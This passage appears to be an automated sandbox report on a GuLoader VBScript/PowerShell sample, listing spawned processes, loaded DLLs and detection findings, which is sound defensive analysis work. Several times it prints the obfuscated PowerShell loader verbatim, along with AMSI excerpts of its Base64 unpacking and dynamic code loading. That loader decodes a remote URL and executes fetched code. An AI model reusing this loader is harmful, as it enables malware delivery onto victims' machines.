Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:Dagbr
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:Dagbr
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:DagbrJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677eJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.2138100600.000002CC9D367000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ion.pdb source: powershell.exe, 00000004.00000002.2136856117.000002CC9D1CD000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodia", "0")
              Yara detected GuLoader
              Source: Yara matchFile source: 00000009.00000002.4239592864.00000000095B5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.4239463001.0000000008370000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.4228266092.00000000055C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Galgal212)$gLobaL:pROJekTmAGerEN = [SYstEM.TExT.EnCODInG]::AsCii.geTsTrIng($SkRmkoRtEts)$GlObAL:fUnNeLFoRM=$pROJEKtMAgeREN.SUbsTRINg($TTTEdEs,$SAltEne)<#Wurrung Akseltappenes Hobbier
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Acrophony77 $Mellemstykkers $Dataoverfrsels), (Nedskre @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Trffe = [AppDomain]::CurrentDomain.GetAssemblies()$g
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Embroideress)), $Choregraphicallydeaful).DefineDynamicModule($Perfekte172, $false).DefineType($Servicekonceptets, $Standsflle14, [Syst
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Galgal212)$gLobaL:pROJekTmAGerEN = [SYstEM.TExT.EnCODInG]::AsCii.geTsTrIng($SkRmkoRtEts)$GlObAL:fUnNeLFoRM=$pROJEKtMAgeREN.SUbsTRINg($TTTEdEs,$SAltEne)<#Wurrung Akseltappenes Hobbier
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:Dagbr
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai 